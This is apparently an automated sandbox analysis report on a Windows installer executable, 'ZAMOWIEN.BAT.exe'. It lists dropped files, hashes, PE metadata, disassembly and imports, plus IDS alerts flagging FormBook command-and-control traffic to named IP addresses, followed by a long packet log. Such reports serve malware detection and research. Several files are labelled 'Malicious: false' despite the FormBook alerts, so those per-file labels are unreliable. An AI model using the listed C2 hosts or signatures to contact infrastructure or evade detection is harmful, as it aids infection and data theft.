SHA-512:	28650700CA8D1D5DCCCA1B66C87AF69973B78A6802A83A57CD593896365AAA703CF015C96D954193AEAB84A54E2A2799F5014AE408075FEFAD341C1AD4085E2D
Malicious:	false
Preview:	.......B...........Z..e....................!...............t.b...5.......................................................I......................................................................8............................"9........................................................}....(.........................J..........................................................................................$........_................................'.._....................................................................(..........".............................g........N.............E.............................................................................................c................................].........................Q..................................................................................................\...N..............................................................................................4.....N........................q........w............................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Applewoman\archontate.txt

Download File

Process:	C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	474
Entropy (8bit):	4.264405979712241
Encrypted:	false
SSDEEP:	12:jqkajxrbAdCMARdmqX0wzW9CnofPL5V0FkOArKVXAPlp:RcbAdBAR8Iy1GkOAW9APH
MD5:	DE9F6CEB400CDE1D8F9FBF08171F9477
SHA1:	87D7074DC8270C34B2B7EC62C8210930A20BFFE1
SHA-256:	02168F28D72A2B160700D8EA9A10A84E19AC228F4B585745FD2D04358726E3AD
SHA-512:	59933F44BBD560010BE827963B005701C15105BF63B7928E4EE988F082AE21CC1C2C02F69FCA9A843639BCAE6292E559D0F7D4A0ACD1144F2E23B904A1A93E1B
Malicious:	false
Preview:	nysgerrighed margenindrykning nonenviable,concreate cubation marshlander unfeminized genbrugsbutikker afkogets celloers unreligioned pastaer skalmejes skeletonless reaktionen..halacha soullessly teliostage forldrepars cyrillaceae overstrew synkefrit insolvency aphacic elverpigerne burmaneren benaevnte..speditionsforretninger fauvists jugementets tankeres nervings..hypospadiac jordskorpens knsrolledebats outspy snedkereres cottae,underslagets overnoble preps sengestolpe.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Applewoman\foreaccounting.afn

Download File

Process:	C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
File Type:	data
Category:	dropped
Size (bytes):	449911
Entropy (8bit):	1.2569789859360412
Encrypted:	false
SSDEEP:	768:9YfCqMtHliyYFCDMUE9j6yQpYruj+Vpc52c8Jj7E4M4Mify9K7fJVHxQNuVKwCCi:Pt1EWFufP3ei0WjQVzJXK3P
MD5:	8160C959AE7C3097E787DB269201A40A
SHA1:	07C8E1065B752B95757B9406656E189A378CEB64
SHA-256:	DB401C6717EB53E19A51DE00E2AF7AE77FBBD3ACD12E2DA0EBDAA4E0D6FD1880
SHA-512:	5CE80922FF02A68846A5753C789898DC40924F23A3B5A754EF38230197E2FFDBB5584C6143766F4EB508A7EEFDEE30EEF3A63DDB6FFAE5D6CC3CEC192DFAB679
Malicious:	false
Preview:	.._.!..........Z...........Q..................................]......\|...........................................................................................x.........................................i..................................................................<........l..................................................................................................................m........................Z.....................................h.......................................x..........h.........................................................."............>............................................4.........................................................9........;..................................%.............^........M................................................O.........g....V........\|...............N..{.........................My....................3.....%..*......................V.`.................................................m.........................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Applewoman\panerende.ret

Download File

Process:	C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
File Type:	data
Category:	dropped
Size (bytes):	434034
Entropy (8bit):	1.253922852732317
Encrypted:	false
SSDEEP:	1536:CPCW/zuIUVYCi2VH8k9qGNjZ3gs7Ho3pU/4jBhmWGtlXb3N9:NW/yIUZzVHBNjzM5BhelXjN9
MD5:	85754174D375345F9C389B6657D93CDB
SHA1:	D944B42D30C74F8BAD33A8A49606E0E3CC924CA4
SHA-256:	A0290F4B32A4CFF32AC200D055159C55F492CD5D6E290A3438F01EB3F9B12A53
SHA-512:	3EC9810D47B62FB678DDBC21B697CCDE04912544DD39B02B30B2E56F70D991BEE25404D8EE91949F26A0AAABBC9C9A84EAC18A604DD090BB3550457C0911530F
Malicious:	false
Preview:	.........................n.....................................................3.............+...................K.!......................P........%.......3.............A....................................................................................................0..k...........................................................................................v...k................@..........9...............................*......................................s...c..+..2............................................................v..................................M............................................................................................9..~.......1....>..................................................j...........................{.........................................p.t.......................................6..........C.......L.........................d........................n.............m...............................................................K....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Unliquefiable.Fla

Download File

Process:	C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
File Type:	data
Category:	dropped
Size (bytes):	300383
Entropy (8bit):	7.516444963107852
Encrypted:	false
SSDEEP:	6144:Rwp2tO4xrS2QHRr/awvUexDzO4vuTGuEWLJ:Sp2B3QHMw8e84uDE4J
MD5:	D7455919B2BA8A0709AECC0DD7495F77
SHA1:	E5B4EBD76BC62A314FD69DFE8872666DFE318211
SHA-256:	00769FEC391ACFD660C17322C36DE2D8AB852A2CD1B77555FB52EBFFFB3CE731
SHA-512:	15DC77812A855B07FABC83793AEBC078736862B2D800E07643F4A76720B1F7FE895FFA2F485DFE7FB9330D2F132AC42E4E975D679C50F0F6E13325156D3B05EF
Malicious:	false
Preview:	.........))....p..N...................................-...yy...(.................z....................................e..........................j......eeeee................E.........YY............3.................N.....??...................i.......................J......j.........@@@.HH......f..........F..P........+..#...........eeee..........MM..........yyy..........zzzz............................z..ff.....vv...W.,.a...........R.>..............K..............)).............................VV._....qqqq.;;;......7...........X...{...........www.....ttt.\|....2.....&&&.KK.s.::::........J.tt....dddd...............ll....................r..h..................................Q....I......zzz........{{..................111.................=..............................m.../........TTT.ZZ.......??.PP...........................77.c.........................y........................I.;...................J..p.................../.........F.......................U...............?...........;.......

C:\Users\user\overlbene.lnk

Download File

Process:	C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	978
Entropy (8bit):	3.20247177063652
Encrypted:	false
SSDEEP:	12:8wl0tsXowAOcQ/tz0/CSLumQX2MJaTRKMJsW+slJaeHgTCNfBT/v4t2YZ/elFlS0:8eLDWLu1Z8ry4HVpdqy
MD5:	071D8F1B4E7C52E45C37A6C443DACBFE
SHA1:	6E25C097BD22505CF40FF2DB645D178CDE3557E1
SHA-256:	33562BCA918D06C4430071866A759E72BDC591A55E83693DCCF4EFA51A3D189F
SHA-512:	7AC214AC8A037B74B0E5D983BA6C4D91A69CAD75D0739DFC1D3286AF2A2DAE63FE68AECF6998A4E356EB69340BA29A19215800DB1069C1AD0087DC4E6E610E39
Malicious:	false
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.2...........Power.for.D............................................P.o.w.e.r...f.o.r...........\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.P.o.w.e.r...f.o.r.U.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.T.e.t.r.a.n.y.c.h.u.s.\.t.o.s.s.e.h.o.v.e.d.e.r.n.e.............y.............>.e.L.:..er.=y...............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.782868933466172
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ZAMOWIEN.BAT.exe
File size:	751'345 bytes
MD5:	2dbe82e3bc304a5b59b1b7c080464f60
SHA1:	1db6b6aee8dc85204b14b73a526cddec8a59b700
SHA256:	11c06f789150adb1484d8f5919399c11be0c4fbc04af20847d4dcb83cb648f02
SHA512:	ce9001ac8aa9889eca1a4bd4638102f634bd43a80f10d7974d7c95d966d5fb575a55751dedd622b99f8ae62ba3a4c3ef9735ef9029a87b43bf7af5c6689c080c
SSDEEP:	12288:WIE5EDEgtTeBTgQFZHmsRe3GwGw/HOHnO6LjewtuABBQqGJCUu8M:WIE5Eg6iTgEZZwGwgxjLMkun1M
TLSH:	92F412033452C5BAED7C8770A82F46A01BA23EAEC5DAC65EE6E03E4D9577350913BF05
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L..._..d.................j....:....

File Icon


Icon Hash:	495a1028082232d1

Static PE Info

General

Entrypoint:	0x40364b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x64A0DC5F [Sun Jul 2 02:09:35 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9dda1a1d1f8a1d13ae0297b47046b26e

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A230h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A0h]
mov esi, dword ptr [004080A4h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F7EE8D4B0FAh
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F7EE8D4B0C8h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [007A8358h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3e0000	0x20968	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6805	0x6a00	5d82b68a850b7d57aa3f3139bd31d813	False	0.6663841391509434	data	6.45459436403362	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1358	0x1400	bd82d08a08da8783923a22b467699302	False	0.4431640625	data	5.103358601944578	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39e3b8	0x600	7f139da0bd126a9604dd689cc8473cb1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x37000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3e0000	0x20968	0x20a00	191faf30aace30aa98e7371a068a77eb	False	0.5353059147509579	data	6.032977737676245	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3e0328	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.25724594818407664
RT_ICON	0x3f0b50	0xb05f	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9947509468228832
RT_ICON	0x3fbbb0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.3849585062240664
RT_ICON	0x3fe158	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.42401500938086306
RT_ICON	0x3ff200	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.5061475409836066
RT_ICON	0x3ffb88	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5851063829787234
RT_DIALOG	0x3ffff0	0xb8	data	English	United States	0.6467391304347826
RT_DIALOG	0x4000a8	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x4001f0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x4002f0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x400410	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x400470	0x5a	data	English	United States	0.7888888888888889
RT_VERSION	0x4004d0	0x204	data	English	United States	0.5406976744186046
RT_MANIFEST	0x4006d8	0x290	XML 1.0 document, ASCII text, with very long lines (656), with no line terminators	English	United States	0.5640243902439024

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-02T07:09:45.075605+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	103.83.194.50	80	TCP
2024-12-02T07:10:28.387140+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49803	195.110.124.133	80	TCP
2024-12-02T07:10:45.307145+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49844	172.67.145.234	80	TCP
2024-12-02T07:10:47.946576+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49850	172.67.145.234	80	TCP
2024-12-02T07:10:50.711038+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49856	172.67.145.234	80	TCP
2024-12-02T07:10:53.421938+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49865	172.67.145.234	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 07:09:43.620749950 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:43.740983009 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:43.741089106 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:43.741488934 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:43.862186909 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.075445890 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.075604916 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.075645924 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.075656891 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.075669050 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.075685978 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.075695992 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.075709105 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.075710058 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.075721979 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.075728893 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.075752974 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.075792074 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.075896025 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.075939894 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.075952053 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.075963974 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.075985909 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.076005936 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.195900917 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.195914030 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.195955038 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.195970058 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.286009073 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.286101103 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.286114931 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.286144972 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.290066957 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.290128946 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.290158033 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.290203094 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.296590090 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.296660900 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.296742916 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.296895981 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.305037975 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.305102110 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.305134058 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.305174112 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.313574076 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.313673973 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.313755035 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.321903944 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.321959019 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.322026968 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.322077990 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.330370903 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.330432892 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.330526114 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.330575943 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.338821888 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.338886023 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.338918924 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.338987112 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.346470118 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.346515894 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.346575975 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.346621990 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.354152918 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.354217052 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.354243040 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.354290009 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.361829996 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.361882925 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.361882925 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.361972094 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.496423006 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.496474028 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.496542931 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.496592045 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.499454021 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.499502897 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.499596119 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.499641895 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.505856037 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.505870104 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.505917072 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.511866093 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.511915922 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.511984110 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.512032986 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.518098116 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.518146992 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.518212080 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.518260956 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.524317026 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.524364948 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.524403095 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.524447918 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.530563116 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.530611038 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.530678034 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.530725002 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.536775112 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.536815882 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.536886930 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.536930084 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.542941093 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.542989969 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.543072939 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.543118954 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.549149036 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.549196005 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.549328089 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.549376011 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.555310011 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.555356979 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.555453062 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.555497885 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.561526060 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.561578035 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.561659098 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.561707020 CET	49736	80	192.168.2.4	103.83.194.50
Dec 2, 2024 07:09:45.567759991 CET	80	49736	103.83.194.50	192.168.2.4
Dec 2, 2024 07:09:45.567806005 CET	49736	80	192.168.2.4	103.83.194.50
